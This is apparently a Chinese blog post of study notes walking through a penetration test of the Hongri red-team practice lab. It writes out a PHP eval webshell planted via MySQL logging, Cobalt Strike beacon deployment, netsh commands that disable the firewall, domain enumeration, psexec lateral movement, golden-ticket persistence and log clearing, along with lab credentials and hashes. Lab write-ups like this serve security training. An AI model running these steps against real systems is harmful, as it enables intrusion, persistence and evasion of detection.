渗透测试-红日靶场一

        小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。

一、搭建环境

1. 网络配置

2. 启动环境

        登录密码:hongrisec@2019(登录时 提示密码过期需更改密码),三台机均为一样的密码。

        登录 win7 开启服务:C:\phpStudy\phpStudy.exe

二、信息收集

1. 扫描 IP

        nmap -sn 192.168.2.0/24                                        // 探测存活 ip 地址

2. 端口检测

        ./fscan -h 192.168.2.133                                             

        该环境中含有 80、3306;80端口中 含有 PHP 探针。

        访问http://192.168.2.133:80,里面透露出了 绝对路径。

        底部发现含有 MySQL 数据库连接(尝试 弱口令破解 root / root )

3. 目录扫描

        dirsearch -u http://192.168.2.133           

        系统文件:phpinfo.php                            

        数据库连接:http://192.168.2.133/phpMyAdmin/

三、漏洞利用

1. 数据库后台(写入 webshell)

        a) show variables like '%general%';                              // 查看全局日志

        b) set global general_log="on";                                // 开启日志

        c) set global general_log_file='C://phpstudy//www//shell.php';  

                上传注入码 PHP文件,路径可以根据 PHP 探针来。

        d) select ‘<?php @eval($_POST[123]);?>’;                     // 写入 shell

2. 连接webshell(蚁剑)

        利用 蚁剑 来进行 webshell 来连接;URL地址 和 连接密码为你上传的 地址 与 密码。

四、蚁剑 联动 CS 来进行后渗透

1. 开启 cs 工具

        ./teamserver 192.168.2.129 123456                                // 配置 cs 环境

        ./start.sh                                                                           // 多开一窗口 运行

2. 创建 监听器 http 与 smb

3. 创建 windows 可执行 exe 程序

        创建 -> 选择 监听器 -> 保存 路径

4. 利用 蚁剑 来上传 cs.exe

        上传 -> 打开终端 -> 执行

        cs 显示出来,就代表监听成功。

五、后渗透

后渗透操作

        进来第一步先关 防火墙

        1. shell netsh advfirewall set allprofiles state off                                                // 关闭防火墙

        2. 提权 -> 监听器 -> 运行

            把它提升到 system 系统权限

        3. shell netsh advfirewall set allprofiles settings remotemanagement enable        // 开启远程 管理

        4. shell netsh advfirewall set allprofiles logging droppedconnections enable        // 放弃记录远程连接记录

六、内网信息收集

网络探测

        1. shell net view                                                                             // 列举 计算机名

        2. ipconfig                                                                                    // 列举 网络IP

        发现 win7 服务器另一条网络为 52,由此可以判断为 内网段

端口扫描

        2. 端口扫描 -> 选含有 52 的网段

抓取密码

        用户:administrator

        域名:GOD.ORG

        密码:123qweASD

        SID :S-1-5-21-2952760202-1353902439-2381784089-500

七、域内信息收集

        shell net group "domain controllers" /domain                         //查看域控

        shell net group "domain admins" /domain                              // 查看域管理员

        shell net user /domain​​​​​​​        ​​​​​​​        ​​​​​​​        ​​​​​​​        ​​​​​​                            ​// 查看域成员

八、横向移动

根据端口扫描,均可发现 域内 含有 445 端口,可以尝试 psexec 来横向移动。

        1. 切换成 目标 列表,

        2. 右击选举 横向移动 -> psexec -> 配置参数 -> 添加 用户名 密码 域名 -> 监听器 -> 会话

        3.显示出来 表成功横向(打进域),同理 域成员 也一样;凡是先 关闭防火墙。

九、权限维持(黄金票据)

        在渗透测试中,"黄金票据"通常指的是在网络攻击中获取的特权访问凭证,通常是域管理员或其他高级权限用户的凭据。这些凭据可以让攻击者在目标网络中自由移动和执行恶意操作。获取黄金票据通常是渗透测试中的一个目标,因为它代表了对目标系统的最高访问权限。

        1. 分别抓取 Hash 和 密码

                SID:S-1-5-20

                Hash:58e91a5ac358d86513ab224312314061

                域名:GOD.ORG

        2. 配置 用户名 -> 域名 -> SID -> Hash

        如图 表成功

十、痕迹清除

        这边小编用的是 cs 插件来清除痕迹;

        痕迹方式:1. 手动清除        2. 软件清除        3. 插件清除

十一、参考文献

        红日域渗透靶场1实战复现_红日一靶场-CSDN博客

        红日01 ATT&CK红队评估 - 哔哩哔哩

        安全研究 | 后渗透阶段清理痕迹方式总结 - FreeBuf网络安全行业门户

  • 21
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值